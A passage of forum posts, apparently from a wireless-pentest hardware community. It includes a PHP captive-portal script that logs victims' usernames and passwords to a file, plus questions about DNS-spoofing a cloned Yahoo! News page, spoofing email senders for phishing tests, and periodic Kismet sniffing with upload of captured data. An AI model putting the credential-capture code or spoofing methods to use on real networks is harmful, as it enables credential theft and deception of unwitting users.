Search the Community

Hi, i have gone through the tutorials for the evilportal module, and now wanted to create a portal on my own for my needs.... I followed the tutorial from frozenjava (which was posted in the forums quite some time ago...), but im having trouble "bending" the code for my needs (basiclly im trying to: get input from "user" and "pass" text field from index.php and print it to a file in /www )... code in index.php: <snip> code in capture.php: <?php $user = $_GET["user"]; $pass = $_GET["pass"]; $redir = $_GET["redir"]; $file = fopen("stored.txt", "a"); fwrite($file, $user . "\n"); fwrite($file, $pass . "\n"); fclose($file); echo '<script type="text/javascript">window.location = "' . $redir . '"</script>'; ?> I think im messing things up with the variables, but im very inexperienced thus i need some help... (oh btw: i didnt get that myportal.php replaced capture.php (i think) at first, so that i manually created my captured.php...) Thanks in advance ;)

What can I add to my config to make it stop collecting packets (Kismet), connect to an AP, send the data it just collected, and go back to sniffing? My current dip config to get the packets I want is ifconfig wlan1 down && iwconfig wlan1 mode monitor && ifconfig wlan1 up && kismet_server && ifconfig wlan0 down What can I add to this so that every x number of hours it can connect to an AP, send some data, and go back to the above configuration? Thanks

Hey all. deleted this as no one wanted to help.

Hello, I am having a problem with loading websites through the WiFi Pineapple. The intent of this was to use DNS Spoof to load a fake Yahoo! News page to create my own headlines as a prank. I used WinSCP to copy over the files to my Pineapple, and have tried both the internal storage and external SD card (not proud of using Windows, but I had to log into that partition eventually to keep it updated). I also later recopied the files straight to the MicroSD card via an adapter. The cloned website (used HTTrack to clone the website to my harddrive) loads properly on my harddrive and on the MicroSD card through an adapter, but when trying to load the web page from the spoofed website address after setting up DNS Spoof or via WinSCP, it seems to not recognise or be able to find the accompanying files (images, css and js files, etc) which are stored in their proper folders. The index page loads, but everything will be completely misaligned and scattered with broken image icons. As a side note, I have successfully done this before using the 1.3 firmware, and recently updated to 1.4.1. I even tried using the previous website's files (the website I previously successfully spoofed), and yet the same issue of it not loading the files. Not entirely sure what I am doing wrong, may be something completely stupid that I am missing, but would certainly appreciate any help possible. If anyone wants to take a look at the website files, I will gladly upload them to my Dropbox or so and provide a link, but as mentioned, it does work properly when not being loaded through the Pineapple. Anyway, thank you guys so much in advanced for your help and I do apologise if it is something completely stupid haha.

Hi guys I have made a mailer script in python that sends phishing emails with personalized links, to track who has taken the bait and who didn't. These people can then be further educated about phishing. The only thing that's missing to start doing these tests is the email spoofing. I see alot of guides and tutorials with telnet, but that does not support HTML/RTF formatting. There are some mailer websites that can send spoofed HTML like http://emkei.cz/. So my question is; how do they do it and is it possible in Python? EDIT: I have a Direct-To-MX mail feature, but the mail just ends up in the spamfolder.

Question: If i clone a web page that contains links to other web pages will they still work? -For example, i clone an index.html. -the real index.html has links to other pages on the site. - i am redirecting my network's taffic to my clone of index.html that is on my pc - if a machine on my network clicks a link on my cloned page will the machine still resort to public dns and go to the speficif web page online?

I don't know, maybe somebody will find this useful in their pentesting arsenal. #!/usr/local/bin/python # HTMLgetter v1.0 by Forgiven # This is a handy bit of python that will reap the HTML code of any page # and output it to a txt file of your choice. import urllib2 urlStr = raw_input('Input the full URL of the webpage whose HTML code you which to reap:') fileName = raw_input("Input the *.txt filename for the output:") fileName = fileName + ".txt" fileOut = open(fileName, "w") try: fileHandle = urllib2.urlopen(urlStr) str1 = fileHandle.read() fileHandle.close() print '-'*50 print 'HTML code of URL =', urlStr print '-'*50 except IOError: print 'Cannot open URL %s for reading' % urlStr str1 = 'error!' fileOut.writelines(str1) print str1 fileOut.close() I thought it was cool, creates a nice txt file of the HTML from a web page...I guess I don't have permission to upload the .py for this above. But the code is small and simple enough to cp. You can find it on github at the link.

So i think i am using the right term data pushing. I see things like changing web data to be submitted or hacks for online games using cheat engine or what not. I am interested in this, but i dont think i am using the right terminology. Is data pushing right? Thanks